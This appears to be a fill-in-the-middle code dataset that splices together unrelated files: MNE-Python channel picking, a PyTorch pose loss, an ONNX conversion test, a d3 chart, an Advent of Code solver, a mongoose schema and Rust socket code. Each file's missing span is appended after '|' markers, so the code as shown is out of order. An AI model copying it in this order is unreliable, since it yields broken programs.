beego.AddFuncMap("ModEq", utils.ModEq)
beego.AddFuncMap("ContainNum", utils.ContainNum)
beego.AddFuncMap("RandNum", utils.RandNum)
beego.AddFuncMap("Add", utils.Add)
}
| Map("NumEq", ut |
pick.py | # Authors: Alexandre Gramfort <[email protected]>
# Matti Hamalainen <[email protected]>
# Martin Luessi <[email protected]>
#
# License: BSD (3-clause)
from copy import deepcopy
import re
import numpy as np
from .constants import FIFF
from ..utils import logger, verbose
from ..externals.six import string_types
def channel_type(info, idx):
"""Get channel type.
Parameters
----------
info : dict
Measurement info
idx : int
Index of channel
Returns
-------
type : 'grad' | 'mag' | 'eeg' | 'stim' | 'eog' | 'emg' | 'ecg'
'ref_meg' | 'resp' | 'exci' | 'ias' | 'syst' | 'misc'
'seeg' | 'bio' | 'chpi' | 'dipole' | 'gof' | 'ecog' | 'hbo' | 'hbr'
Type of channel
"""
kind = info['chs'][idx]['kind']
if kind == FIFF.FIFFV_MEG_CH:
if info['chs'][idx]['unit'] == FIFF.FIFF_UNIT_T_M:
return 'grad'
elif info['chs'][idx]['unit'] == FIFF.FIFF_UNIT_T:
return 'mag'
elif kind == FIFF.FIFFV_REF_MEG_CH:
return 'ref_meg'
elif kind == FIFF.FIFFV_EEG_CH:
return 'eeg'
elif kind == FIFF.FIFFV_STIM_CH:
return 'stim'
elif kind == FIFF.FIFFV_EOG_CH:
return 'eog'
elif kind == FIFF.FIFFV_EMG_CH:
return 'emg'
elif kind == FIFF.FIFFV_ECG_CH:
return 'ecg'
elif kind == FIFF.FIFFV_RESP_CH:
return 'resp'
elif kind == FIFF.FIFFV_MISC_CH:
return 'misc'
elif kind == FIFF.FIFFV_EXCI_CH:
return 'exci'
elif kind == FIFF.FIFFV_IAS_CH:
return 'ias'
elif kind == FIFF.FIFFV_SYST_CH:
return 'syst'
elif kind == FIFF.FIFFV_SEEG_CH:
return 'seeg'
elif kind == FIFF.FIFFV_BIO_CH:
return 'bio'
elif kind in [FIFF.FIFFV_QUAT_0, FIFF.FIFFV_QUAT_1, FIFF.FIFFV_QUAT_2,
FIFF.FIFFV_QUAT_3, FIFF.FIFFV_QUAT_4, FIFF.FIFFV_QUAT_5,
FIFF.FIFFV_QUAT_6, FIFF.FIFFV_HPI_G, FIFF.FIFFV_HPI_ERR,
FIFF.FIFFV_HPI_MOV]:
return 'chpi' # channels relative to head position monitoring
elif kind == FIFF.FIFFV_DIPOLE_WAVE:
return 'dipole'
elif kind == FIFF.FIFFV_GOODNESS_FIT:
return 'gof'
elif kind == FIFF.FIFFV_ECOG_CH:
return 'ecog'
elif kind == FIFF.FIFFV_FNIRS_CH:
if info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_FNIRS_HBO:
return 'hbo'
elif info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_FNIRS_HBR:
return 'hbr'
raise Exception('Unknown channel type')
def pick_channels(ch_names, include, exclude=[]):
"""Pick channels by names.
Returns the indices of the good channels in ch_names.
Parameters
----------
ch_names : list of string
List of channels.
include : list of string
List of channels to include (if empty include all available).
.. note:: This is to be treated as a set. The order of this list
is not used or maintained in ``sel``.
exclude : list of string
List of channels to exclude (if empty do not exclude any channel).
Defaults to [].
See Also
--------
pick_channels_regexp, pick_types
Returns
-------
sel : array of int
Indices of good channels.
"""
if len(np.unique(ch_names)) != len(ch_names):
raise RuntimeError('ch_names is not a unique list, picking is unsafe')
_check_excludes_includes(include)
_check_excludes_includes(exclude)
if not isinstance(include, set):
include = set(include)
if not isinstance(exclude, set):
exclude = set(exclude)
sel = []
for k, name in enumerate(ch_names):
if (len(include) == 0 or name in include) and name not in exclude:
sel.append(k)
return np.array(sel, int)
def pick_channels_regexp(ch_names, regexp):
"""Pick channels using regular expression.
Returns the indices of the good channels in ch_names.
Parameters
----------
ch_names : list of string
List of channels
regexp : string
The regular expression. See python standard module for regular
expressions.
Returns
-------
sel : array of int
Indices of good channels.
See Also
--------
pick_channels
Examples
--------
>>> pick_channels_regexp(['MEG 2331', 'MEG 2332', 'MEG 2333'], 'MEG ...1')
[0]
>>> pick_channels_regexp(['MEG 2331', 'MEG 2332', 'MEG 2333'], 'MEG *')
[0, 1, 2]
"""
r = re.compile(regexp)
return [k for k, name in enumerate(ch_names) if r.match(name)]
def _triage_meg_pick(ch, meg):
"""Triage an MEG pick type."""
if meg is True:
return True
elif ch['unit'] == FIFF.FIFF_UNIT_T_M:
if meg == 'grad':
return True
elif meg == 'planar1' and ch['ch_name'].endswith('2'):
return True
elif meg == 'planar2' and ch['ch_name'].endswith('3'):
return True
elif (meg == 'mag' and ch['unit'] == FIFF.FIFF_UNIT_T):
return True
return False
def _triage_fnirs_pick(ch, fnirs):
"""Triage an fNIRS pick type."""
if fnirs is True:
return True
elif ch['coil_type'] == FIFF.FIFFV_COIL_FNIRS_HBO and fnirs == 'hbo':
return True
elif ch['coil_type'] == FIFF.FIFFV_COIL_FNIRS_HBR and fnirs == 'hbr':
return True
return False
def _check_meg_type(meg, allow_auto=False):
"""Ensure a valid meg type."""
if isinstance(meg, string_types):
allowed_types = ['grad', 'mag', 'planar1', 'planar2']
allowed_types += ['auto'] if allow_auto else []
if meg not in allowed_types:
raise ValueError('meg value must be one of %s or bool, not %s'
% (allowed_types, meg))
def pick_types(info, meg=True, eeg=False, stim=False, eog=False, ecg=False,
emg=False, ref_meg='auto', misc=False, resp=False, chpi=False,
exci=False, ias=False, syst=False, seeg=False, dipole=False,
gof=False, bio=False, ecog=False, fnirs=False, include=(),
exclude='bads', selection=None):
"""Pick channels by type and names.
Parameters
----------
info : dict
The measurement info.
meg : bool | str
If True include all MEG channels. If False include None
If string it can be 'mag', 'grad', 'planar1' or 'planar2' to select
only magnetometers, all gradiometers, or a specific type of
gradiometer.
eeg : bool
If True include EEG channels.
stim : bool
If True include stimulus channels.
eog : bool
If True include EOG channels.
ecg : bool
If True include ECG channels.
emg : bool
If True include EMG channels.
ref_meg: bool | str
If True include CTF / 4D reference channels. If 'auto', the reference
channels are only included if compensations are present. Can also be
the string options from `meg`.
misc : bool
If True include miscellaneous analog channels.
resp : bool
If True include response-trigger channel. For some MEG systems this
is separate from the stim channel.
chpi : bool
If True include continuous HPI coil channels.
exci : bool
Flux excitation channel used to be a stimulus channel.
ias : bool
Internal Active Shielding data (maybe on Triux only).
syst : bool
System status channel information (on Triux systems only).
seeg : bool
Stereotactic EEG channels.
dipole : bool
Dipole time course channels.
gof : bool
Dipole goodness of fit channels.
bio : bool
Bio channels.
ecog : bool
Electrocorticography channels.
fnirs : bool | str
Functional near-infrared spectroscopy channels. If True include all
fNIRS channels. If False (default) include none. If string it can be
'hbo' (to include channels measuring oxyhemoglobin) or 'hbr' (to
include channels measuring deoxyhemoglobin).
include : list of string
List of additional channels to include. If empty do not include any.
exclude : list of string | str
List of channels to exclude. If 'bads' (default), exclude channels
in ``info['bads']``.
selection : list of string
Restrict sensor channels (MEG, EEG) to this list of channel names.
Returns
-------
sel : array of int
Indices of good channels.
"""
# NOTE: Changes to this function's signature should also be changed in
# PickChannelsMixin
from .meas_info import Info
if not isinstance(info, Info):
raise TypeError('info must be an instance of Info, not %s'
% type(info))
info._check_consistency()
nchan = info['nchan']
pick = np.zeros(nchan, dtype=np.bool)
if exclude is None:
raise ValueError('exclude must be a list of strings or "bads"')
elif exclude == 'bads':
exclude = info.get('bads', [])
elif not isinstance(exclude, (list, tuple)):
raise ValueError('exclude must either be "bads" or a list of strings.'
' If only one channel is to be excluded, use '
'[ch_name] instead of passing ch_name.')
_check_meg_type(ref_meg, allow_auto=True)
_check_meg_type(meg)
if isinstance(ref_meg, string_types) and ref_meg == 'auto':
ref_meg = ('comps' in info and info['comps'] is not None and
len(info['comps']) > 0)
for param in (eeg, stim, eog, ecg, emg, misc, resp, chpi, exci,
ias, syst, seeg, dipole, gof, bio, ecog):
if not isinstance(param, bool):
w = ('Parameters for all channel types (with the exception '
'of "meg", "ref_meg" and "fnirs") must be of type bool, '
'not {0}.')
raise ValueError(w.format(type(param)))
for k in range(nchan):
kind = info['chs'][k]['kind']
# XXX eventually we should de-duplicate this with channel_type!
if kind == FIFF.FIFFV_MEG_CH and meg:
pick[k] = _triage_meg_pick(info['chs'][k], meg)
elif kind == FIFF.FIFFV_EEG_CH and eeg:
pick[k] = True
elif kind == FIFF.FIFFV_STIM_CH and stim:
pick[k] = True
elif kind == FIFF.FIFFV_EOG_CH and eog:
pick[k] = True
elif kind == FIFF.FIFFV_ECG_CH and ecg:
pick[k] = True
elif kind == FIFF.FIFFV_EMG_CH and emg:
pick[k] = True
elif kind == FIFF.FIFFV_MISC_CH and misc:
pick[k] = True
elif kind == FIFF.FIFFV_REF_MEG_CH and ref_meg:
pick[k] = _triage_meg_pick(info['chs'][k], ref_meg)
elif kind == FIFF.FIFFV_RESP_CH and resp:
pick[k] = True
elif kind == FIFF.FIFFV_SYST_CH and syst:
pick[k] = True
elif kind == FIFF.FIFFV_SEEG_CH and seeg:
pick[k] = True
elif kind == FIFF.FIFFV_IAS_CH and ias:
pick[k] = True
elif kind == FIFF.FIFFV_EXCI_CH and exci:
pick[k] = True
elif kind in [FIFF.FIFFV_QUAT_0, FIFF.FIFFV_QUAT_1, FIFF.FIFFV_QUAT_2,
FIFF.FIFFV_QUAT_3, FIFF.FIFFV_QUAT_4, FIFF.FIFFV_QUAT_5,
FIFF.FIFFV_QUAT_6, FIFF.FIFFV_HPI_G, FIFF.FIFFV_HPI_ERR,
FIFF.FIFFV_HPI_MOV] and chpi:
pick[k] = True
elif kind == FIFF.FIFFV_DIPOLE_WAVE and dipole:
pick[k] = True
elif kind == FIFF.FIFFV_GOODNESS_FIT and gof:
pick[k] = True
elif kind == FIFF.FIFFV_BIO_CH and bio:
pick[k] = True
elif kind == FIFF.FIFFV_ECOG_CH and ecog:
pick[k] = True
elif kind == FIFF.FIFFV_FNIRS_CH:
pick[k] = _triage_fnirs_pick(info['chs'][k], fnirs)
# restrict channels to selection if provided
if selection is not None:
# the selection only restricts these types of channels
sel_kind = [FIFF.FIFFV_MEG_CH, FIFF.FIFFV_REF_MEG_CH,
FIFF.FIFFV_EEG_CH]
for k in np.where(pick)[0]:
if (info['chs'][k]['kind'] in sel_kind and
info['ch_names'][k] not in selection):
pick[k] = False
myinclude = [info['ch_names'][k] for k in range(nchan) if pick[k]]
myinclude += include
if len(myinclude) == 0:
sel = np.array([], int)
else:
sel = pick_channels(info['ch_names'], myinclude, exclude)
return sel
def pick_info(info, sel=(), copy=True):
"""Restrict an info structure to a selection of channels.
Parameters
----------
info : dict
Info structure from evoked or raw data.
sel : list of int | None
Indices of channels to include.
copy : bool
If copy is False, info is modified inplace.
Returns
-------
res : dict
Info structure restricted to a selection of channels.
"""
info._check_consistency()
info = info.copy() if copy else info
if sel is None:
return info
elif len(sel) == 0:
raise ValueError('No channels match the selection.')
info['chs'] = [info['chs'][k] for k in sel]
info._update_redundant()
info['bads'] = [ch for ch in info['bads'] if ch in info['ch_names']]
comps = deepcopy(info['comps'])
for c in comps:
row_idx = [k for k, n in enumerate(c['data']['row_names'])
if n in info['ch_names']]
row_names = [c['data']['row_names'][i] for i in row_idx]
rowcals = c['rowcals'][row_idx]
c['rowcals'] = rowcals
c['data']['nrow'] = len(row_names)
c['data']['row_names'] = row_names
c['data']['data'] = c['data']['data'][row_idx]
info['comps'] = comps
info._check_consistency()
return info
def _has_kit_refs(info, picks):
"""Determine if KIT ref channels are chosen.
This is currently only used by make_forward_solution, which cannot
run when KIT reference channels are included.
"""
for p in picks:
if info['chs'][p]['coil_type'] == FIFF.FIFFV_COIL_KIT_REF_MAG:
return True
return False
def pick_channels_evoked(orig, include=[], exclude='bads'):
"""Pick channels from evoked data.
Parameters
----------
orig : Evoked object
One evoked dataset.
include : list of string, (optional)
List of channels to include (if empty, include all available).
exclude : list of string | str
List of channels to exclude. If empty do not exclude any (default).
If 'bads', exclude channels in orig.info['bads']. Defaults to 'bads'.
Returns
-------
res : instance of Evoked
Evoked data restricted to selected channels. If include and
exclude are empty it returns orig without copy.
"""
if len(include) == 0 and len(exclude) == 0:
return orig
exclude = _check_excludes_includes(exclude, info=orig.info,
allow_bads=True)
sel = pick_channels(orig.info['ch_names'], include=include,
exclude=exclude)
if len(sel) == 0:
raise ValueError('Warning : No channels match the selection.')
res = deepcopy(orig)
#
# Modify the measurement info
#
res.info = pick_info(res.info, sel)
#
# Create the reduced data set
#
res.data = res.data[sel, :]
return res
@verbose
def pick_channels_forward(orig, include=[], exclude=[], verbose=None):
"""Pick channels from forward operator.
Parameters
----------
orig : dict
A forward solution.
include : list of string
List of channels to include (if empty, include all available).
Defaults to [].
exclude : list of string | 'bads'
Channels to exclude (if empty, do not exclude any). Defaults to [].
If 'bads', then exclude bad channels in orig.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
res : dict
Forward solution restricted to selected channels. If include and
exclude are empty it returns orig without copy.
"""
orig['info']._check_consistency()
if len(include) == 0 and len(exclude) == 0:
return orig
exclude = _check_excludes_includes(exclude,
info=orig['info'], allow_bads=True)
# Allow for possibility of channel ordering in forward solution being
# different from that of the M/EEG file it is based on.
sel_sol = pick_channels(orig['sol']['row_names'], include=include,
exclude=exclude)
sel_info = pick_channels(orig['info']['ch_names'], include=include,
exclude=exclude)
fwd = deepcopy(orig)
# Check that forward solution and original data file agree on #channels
if len(sel_sol) != len(sel_info):
raise ValueError('Forward solution and functional data appear to '
'have different channel names, please check.')
# Do we have something?
nuse = len(sel_sol)
if nuse == 0:
raise ValueError('Nothing remains after picking')
logger.info(' %d out of %d channels remain after picking'
% (nuse, fwd['nchan']))
# Pick the correct rows of the forward operator using sel_sol
fwd['sol']['data'] = fwd['sol']['data'][sel_sol, :]
fwd['_orig_sol'] = fwd['_orig_sol'][sel_sol, :]
fwd['sol']['nrow'] = nuse
ch_names = [fwd['sol']['row_names'][k] for k in sel_sol]
fwd['nchan'] = nuse
fwd['sol']['row_names'] = ch_names
# Pick the appropriate channel names from the info-dict using sel_info
fwd['info']['chs'] = [fwd['info']['chs'][k] for k in sel_info]
fwd['info']._update_redundant()
fwd['info']['bads'] = [b for b in fwd['info']['bads'] if b in ch_names]
if fwd['sol_grad'] is not None:
fwd['sol_grad']['data'] = fwd['sol_grad']['data'][sel_sol, :]
fwd['_orig_sol_grad'] = fwd['_orig_sol_grad'][sel_sol, :]
fwd['sol_grad']['nrow'] = nuse
fwd['sol_grad']['row_names'] = [fwd['sol_grad']['row_names'][k]
for k in sel_sol]
return fwd
def pick_types_forward(orig, meg=True, eeg=False, ref_meg=True, seeg=False,
ecog=False, include=[], exclude=[]):
"""Pick by channel type and names from a forward operator.
Parameters
----------
orig : dict
A forward solution
meg : bool or string
If True include all MEG channels. If False include None
If string it can be 'mag' or 'grad' to select only gradiometers
or magnetometers.
eeg : bool
If True include EEG channels
ref_meg : bool
If True include CTF / 4D reference channels
seeg : bool
If True include stereotactic EEG channels
ecog : bool
If True include electrocorticography channels
include : list of string
List of additional channels to include. If empty do not include any.
exclude : list of string | str
List of channels to exclude. If empty do not exclude any (default).
If 'bads', exclude channels in orig['info']['bads'].
Returns
-------
res : dict
Forward solution restricted to selected channel types.
"""
info = orig['info']
sel = pick_types(info, meg, eeg, ref_meg=ref_meg, seeg=seeg, ecog=ecog,
include=include, exclude=exclude)
if len(sel) == 0:
raise ValueError('No valid channels found')
include_ch_names = [info['ch_names'][k] for k in sel]
return pick_channels_forward(orig, include_ch_names)
def channel_indices_by_type(info):
"""Get indices of channels by type."""
idx = dict((key, list()) for key in _PICK_TYPES_KEYS if
key not in ('meg', 'fnirs'))
idx.update(mag=list(), grad=list(), hbo=list(), hbr=list())
for k, ch in enumerate(info['chs']):
for key in idx.keys():
if channel_type(info, k) == key:
idx[key].append(k)
return idx
def pick_channels_cov(orig, include=[], exclude='bads'):
"""Pick channels from covariance matrix.
Parameters
----------
orig : Covariance
A covariance.
include : list of string, (optional)
List of channels to include (if empty, include all available).
exclude : list of string, (optional) | 'bads'
Channels to exclude (if empty, do not exclude any). Defaults to 'bads'.
Returns
-------
res : dict
Covariance solution restricted to selected channels.
"""
from ..cov import Covariance
exclude = orig['bads'] if exclude == 'bads' else exclude
sel = pick_channels(orig['names'], include=include, exclude=exclude)
data = orig['data'][sel][:, sel] if not orig['diag'] else orig['data'][sel]
names = [orig['names'][k] for k in sel]
bads = [name for name in orig['bads'] if name in orig['names']]
res = Covariance(
data=data, names=names, bads=bads, projs=deepcopy(orig['projs']),
nfree=orig['nfree'], eig=None, eigvec=None,
method=orig.get('method', None), loglik=orig.get('loglik', None))
return res
def _picks_by_type(info, meg_combined=False, ref_meg=False, exclude='bads'):
"""Get data channel indices as separate list of tuples.
Parameters
----------
info : instance of mne.measuerment_info.Info
The info.
meg_combined : bool
Whether to return combined picks for grad and mag.
ref_meg : bool
If True include CTF / 4D reference channels
exclude : list of string | str
List of channels to exclude. If 'bads' (default), exclude channels
in info['bads'].
Returns
-------
picks_list : list of tuples
The list of tuples of picks and the type string.
"""
from ..channels.channels import _contains_ch_type
picks_list = []
has_mag, has_grad, has_eeg = [_contains_ch_type(info, k)
for k in ('mag', 'grad', 'eeg')]
if has_mag and (meg_combined is not True or not has_grad):
picks_list.append(
('mag', pick_types(info, meg='mag', eeg=False, stim=False,
ref_meg=ref_meg, exclude=exclude))
)
if has_grad and (meg_combined is not True or not has_mag):
picks_list.append(
('grad', pick_types(info, meg='grad', eeg=False, stim=False,
ref_meg=ref_meg, exclude=exclude))
)
if has_mag and has_grad and meg_combined is True:
picks_list.append(
('meg', pick_types(info, meg=True, eeg=False, stim=False,
ref_meg=ref_meg, exclude=exclude))
)
if has_eeg:
picks_list.append(
('eeg', pick_types(info, meg=False, eeg=True, stim=False,
ref_meg=ref_meg, exclude=exclude))
)
return picks_list
def _check_excludes_includes(chs, info=None, allow_bads=False):
"""Ensure that inputs to exclude/include are list-like or "bads".
Parameters
----------
chs : any input, should be list, tuple, string
The channels passed to include or exclude.
allow_bads : bool
Allow the user to supply "bads" as a string for auto exclusion.
Returns
-------
chs : list
Channels to be excluded/excluded. If allow_bads, and chs=="bads",
this will be the bad channels found in 'info'.
"""
from .meas_info import Info | raise ValueError('Supply an info object if allow_bads is true')
elif chs != 'bads':
raise ValueError('If chs is a string, it must be "bads"')
else:
chs = info['bads']
else:
raise ValueError(
'include/exclude must be list, tuple, ndarray, or "bads". ' +
'You provided type {0}'.format(type(chs)))
return chs
_PICK_TYPES_DATA_DICT = dict(
meg=True, eeg=True, stim=False, eog=False, ecg=False, emg=False,
misc=False, resp=False, chpi=False, exci=False, ias=False, syst=False,
seeg=True, dipole=False, gof=False, bio=False, ecog=True, fnirs=True)
_PICK_TYPES_KEYS = tuple(list(_PICK_TYPES_DATA_DICT.keys()) + ['ref_meg'])
_DATA_CH_TYPES_SPLIT = ['mag', 'grad', 'eeg', 'seeg', 'ecog', 'hbo', 'hbr']
# Valid data types, ordered for consistency, used in viz/evoked.
_VALID_CHANNEL_TYPES = ['eeg', 'grad', 'mag', 'seeg', 'eog', 'ecg', 'emg',
'dipole', 'gof', 'bio', 'ecog', 'hbo', 'hbr',
'misc']
def _pick_data_channels(info, exclude='bads', with_ref_meg=True):
"""Pick only data channels."""
return pick_types(info, ref_meg=with_ref_meg, include=[], exclude=exclude,
selection=None, **_PICK_TYPES_DATA_DICT)
def _pick_aux_channels(info, exclude='bads'):
"""Pick only auxiliary channels.
Corresponds to EOG, ECG, EMG and BIO
"""
return pick_types(info, meg=False, eog=True, ecg=True, emg=True, bio=True,
ref_meg=False, exclude=exclude)
def _pick_data_or_ica(info):
"""Pick only data or ICA channels."""
ch_names = [c['ch_name'] for c in info['chs']]
if 'ICA ' in ','.join(ch_names):
picks = pick_types(info, exclude=[], misc=True)
else:
picks = _pick_data_channels(info, exclude=[], with_ref_meg=True)
return picks | if not isinstance(chs, (list, tuple, np.ndarray)):
if allow_bads is True:
if not isinstance(info, Info): |
params_loss.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import time
import pickle
import numpy as np
import config
import constants
from config import args
from utils import batch_rodrigues, rotation_matrix_to_angle_axis
def batch_l2_loss(real,predict):
loss_batch = torch.norm(real-predict, p=2, dim=1)
return loss_batch.mean()
def batch_l2_loss_param(real,predict):
# convert to rot mat, multiple angular maps to the same rotation with Pi as a period.
batch_size = real.shape[0]
real = batch_rodrigues(real.reshape(-1,3)).contiguous()#(N*J)*3 -> (N*J)*3*3
predict = batch_rodrigues(predict.reshape(-1,3)).contiguous()#(N*J)*3 -> (N*J)*3*3
loss = torch.norm((real-predict).view(-1,9), p=2, dim=-1)#self.sl1loss(real,predict)#
loss = loss.reshape(batch_size, -1).mean(-1)
return loss
def _calc_MPJAE(rel_pose_pred,rel_pose_real):
global_pose_rotmat_pred = trans_relative_rot_to_global_rotmat(rel_pose_pred, with_global_rot=True)
global_pose_rotmat_real = trans_relative_rot_to_global_rotmat(rel_pose_real, with_global_rot=True)
MPJAE_error = _calc_joint_angle_error(global_pose_rotmat_pred, global_pose_rotmat_real).cpu().numpy()
return MPJAE_error
def trans_relative_rot_to_global_rotmat(params, with_global_rot=False):
'''
calculate absolute rotation matrix in the global coordinate frame of K body parts.
The rotation is the map from the local bone coordinate frame to the global one.
K= 9 parts in the following order:
root (JOINT 0) , left hip (JOINT 1), right hip (JOINT 2), left knee (JOINT 4), right knee (JOINT 5),
left shoulder (JOINT 16), right shoulder (JOINT 17), left elbow (JOINT 18), right elbow (JOINT 19).
parent kinetic tree [-1, 0, 0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9, 9, 12, 13, 14, 16, 17, 18, 19, 20, 21]
'''
batch_size, param_num = params.shape[0], params.shape[1]//3
pose_rotmat = batch_rodrigues(params.reshape(-1,3)).view(batch_size, param_num, 3, 3).contiguous()
if with_global_rot:
sellect_joints = np.array([0,1,2,4,5,16,17,18,19],dtype=np.int)
results = [pose_rotmat[:, 0]]
for idx in range(param_num-1):
i_val = int(idx + 1)
joint_rot = pose_rotmat[:, i_val]
parent = constants.kintree_parents[i_val]
glob_transf_mat = torch.matmul(results[parent], joint_rot)
results.append(glob_transf_mat)
else:
sellect_joints = np.array([1,2,4,5,16,17,18,19],dtype=np.int)-1
results = [torch.eye(3,3)[None].cuda().repeat(batch_size,1,1)]
for i_val in range(param_num-1): | glob_transf_mat = torch.matmul(results[parent], joint_rot)
results.append(glob_transf_mat)
global_rotmat = torch.stack(results, axis=1)[:, sellect_joints].contiguous()
return global_rotmat
def _calc_joint_angle_error(pred_mat, gt_mat, return_axis_angle=False):
"""
Compute the geodesic distance between the two input matrices.
:param pred_mat: predicted rotation matrices. Shape: ( Seq, 9g, 3, 3)
:param gt_mat: ground truth rotation matrices. Shape: ( Seq, 9, 3, 3)
:return: Mean geodesic distance between input matrices.
"""
# Reshape the matrices into B x 3 x 3 arrays
r1 = pred_mat.reshape(-1,3,3)
r2 = gt_mat.reshape(-1,3,3)
# Transpose gt matrices
r2t = r2.permute(0,2,1)
r = torch.matmul(r1, r2t)
# Convert rotation matrix to axis angle representation and find the angle
axis_angles = rotation_matrix_to_angle_axis(r)
angles = torch.norm(axis_angles, dim=-1)*(180./np.pi)
if return_axis_angle:
return angles,axis_angles
return angles | #i_val = int(idx + 1)
joint_rot = pose_rotmat[:, i_val]
parent = constants.kintree_parents[i_val+1] |
test_convert_to_onnx.py | import logging
import pytest
import os
from functional_tests.t_utils import remove_tmp_dir, create_tmp_dir, __data_testing_dir__
from ivadomed.scripts import convert_to_onnx
from ivadomed.utils import ArgParseException
logger = logging.getLogger(__name__)
__model_path__ = os.path.join(__data_testing_dir__, 'spinegeneric_model.pt')
def setup_function():
create_tmp_dir()
def test_convert_to_onnx():
convert_to_onnx.main(args=['-m', f'{__model_path__}', '-d', '2'])
assert os.path.exists(os.path.join(__data_testing_dir__, 'spinegeneric_model.onnx'))
def test_convert_to_onnx_no_model():
with pytest.raises(ArgParseException, match=r"Error parsing args"):
convert_to_onnx.main(args=['-d', '2'])
def test_convert_to_onnx_no_dimension():
with pytest.raises(ArgParseException, match=r"Error parsing args"):
convert_to_onnx.main(args=['-m', f'{__model_path__}'])
def teardown_function():
remove_tmp_dir() | ||
app.js | const data = [
{date: 1988, num: 51}, {date: 1989, num: 60},
{date: 1990, num: 62}, {date: 1991, num: -64},
{date: 1992, num: 69}, {date: 1993, num: 69},
{date: 1994, num: 75}, {date: 1995, num: 80},
{date: 1996, num: 91}, {date: 1997, num: 93},
{date: 1998, num: 97}, {date: 1999, num: 100},
{date: 2000, num: -103}, {date: 2001, num: 104},
{date: 2002, num: 105}, {date: 2003, num: 110},
{date: 2004, num: 111}, {date: 2005, num: 112},
{date: 2006, num: 112}, {date: 2007, num: 113},
{date: 2008, num: 119}, {date: 2009, num: 128},
{date: 2010, num: 139}, {date: 2011, num: -139},
{date: 2012, num: 139}, {date: 2013, num: 140},
{date: 2014, num: 143}, {date: 2015, num: 146},
{date: 2016, num: 147}, {date: 2017, num: 149}
];
const timeParse = d3.timeParse('%Y');
const timeFormat = d3.timeFormat('%Y');
const chartWidth = 1000;
const chartHeight = 800;
const padding = 50;
data.forEach((e, i) => data[i].date = timeParse(e.date));
const xScale = d3.scaleTime()
.domain([d3.min(data, d => d.date), d3.max(data, d => d.date)])
.range([padding, chartWidth - padding]);
const yScale = d3.scaleLinear()
.domain([0, d3.max(data, d => d.num)])
.range([chartHeight - padding, padding]);
const svg = d3.select('#chart')
.append('svg')
.attr('width', chartWidth)
.attr('height', chartHeight);
const xAxis = d3.axisBottom(xScale)
.ticks(10)
| .ticks(12);
svg.append('g')
.attr('transform', 'translate(0,' + (chartHeight - padding) + ')')
.call(xAxis);
svg.append('g')
.attr('transform', 'translate(' + padding + ',0)')
.call(yAxis);
let line = d3.line()
.defined(d => d.num >= 0)
.x(d => xScale(d.date))
.y(d => yScale(d.num));
svg.append('path')
.datum(data)
.attr('fill', 'none')
.attr('stroke', '#73FF36')
.attr('stroke-width', 5)
.attr('d', line); | .tickFormat(timeFormat);
const yAxis = d3.axisLeft(yScale)
|
8.py | with open('input.txt') as f:
img_data = f.readline().strip()
img_w = 25
img_h = 6
layer_num_pixels = img_w * img_h
img_num_layers = len(img_data) // layer_num_pixels
print("img_num_layers = %d" % img_num_layers)
layer_data = []
for i in range(img_num_layers):
a, b = layer_num_pixels*i, layer_num_pixels*(i+1)
layer_data.append(img_data[a:b])
def _layer_count_digits(data, digit):
result = 0
for i in range(len(data)):
if data[i] == digit: result += 1
return result
def layer_count_zeros(data):
return _layer_count_digits(data, "0")
def | (data):
return _layer_count_digits(data, "1")
def layer_count_twos(data):
return _layer_count_digits(data, "2")
min_zeros_index, min_zeros_count = -1, 0
for i in range(len(layer_data)):
zeros_count = layer_count_zeros(layer_data[i])
if min_zeros_index == -1: min_zeros_index, min_zeros_count = i, zeros_count
elif zeros_count < min_zeros_count: min_zeros_index, min_zeros_count = i, zeros_count
print("min_zeros_index = %d" % min_zeros_index)
print("min_zeros_count = %d" % min_zeros_count)
ones_count = layer_count_ones(layer_data[min_zeros_index])
twos_count = layer_count_twos(layer_data[min_zeros_index])
print("ones_count * twos_count = %d * %d = %d" % (ones_count, twos_count, ones_count * twos_count))
render_data = []
for y in range(img_h):
for x in range(img_w):
t = y * img_w + x
pixel_color = "2"
for z in range(img_num_layers):
if layer_data[z][t] != "2":
pixel_color = layer_data[z][t]
break
render_data.append(pixel_color)
z = 0
for y in range(img_h):
for x in range(img_w):
pixel_color = render_data[z]
if pixel_color == "0": pixel_color = " "
print(pixel_color, end='')
z += 1
print("")
| layer_count_ones |
user.js | import mongoose from 'mongoose'
import {USER_ROLES, USER_STATUS} from '../utils/constants'
const schema = mongoose.Schema(
{
email: String,
address: String, | password: String,
role: {
type: String,
enum: Object.values(USER_ROLES),
default: USER_ROLES.BIDDER
},
status: {
type: String,
enum: Object.values(USER_STATUS),
default: USER_STATUS.NOT_VERIFIED
},
refreshToken: String
},
{timestamps: {createdAt: 'createdAt', updatedAt: 'updatedAt'}}
)
export default mongoose.model('User', schema) | fullName: String, |
tcp_listener_accpet.rs | use std::io;
use std::net::SocketAddr;
use std::os::windows::io::AsRawSocket;
use super::super::{add_socket, co_io_result, EventData};
use crate::coroutine_impl::{co_cancel_data, CoroutineImpl, EventSource};
use crate::io::cancel::CancelIoData;
use crate::io::OptionCell;
use crate::net::{TcpListener, TcpStream};
use crate::scheduler::get_scheduler;
use crate::sync::delay_drop::DelayDrop;
use miow::net::{AcceptAddrsBuf, TcpListenerExt};
use winapi::shared::ntdef::*;
pub struct TcpListenerAccept<'a> {
io_data: EventData,
socket: &'a ::std::net::TcpListener,
ret: OptionCell<::std::net::TcpStream>,
addr: AcceptAddrsBuf,
can_drop: DelayDrop,
}
impl<'a> TcpListenerAccept<'a> {
pub fn new(socket: &'a TcpListener) -> io::Result<Self> {
use socket2::{Domain, Socket, Type}; | SocketAddr::V4(..) => Socket::new(Domain::IPV4, Type::STREAM, None)?,
SocketAddr::V6(..) => Socket::new(Domain::IPV6, Type::STREAM, None)?,
};
let stream = stream.into();
Ok(TcpListenerAccept {
io_data: EventData::new(socket.as_raw_socket() as HANDLE),
socket: socket.inner(),
ret: OptionCell::new(stream),
addr: AcceptAddrsBuf::new(),
can_drop: DelayDrop::new(),
})
}
pub fn done(&mut self) -> io::Result<(TcpStream, SocketAddr)> {
co_io_result(&self.io_data)?;
let socket = &self.socket;
let ss = self.ret.take();
let s = socket.accept_complete(&ss).and_then(|_| {
ss.set_nonblocking(true)?;
add_socket(&ss).map(|io| TcpStream::from_stream(ss, io))
})?;
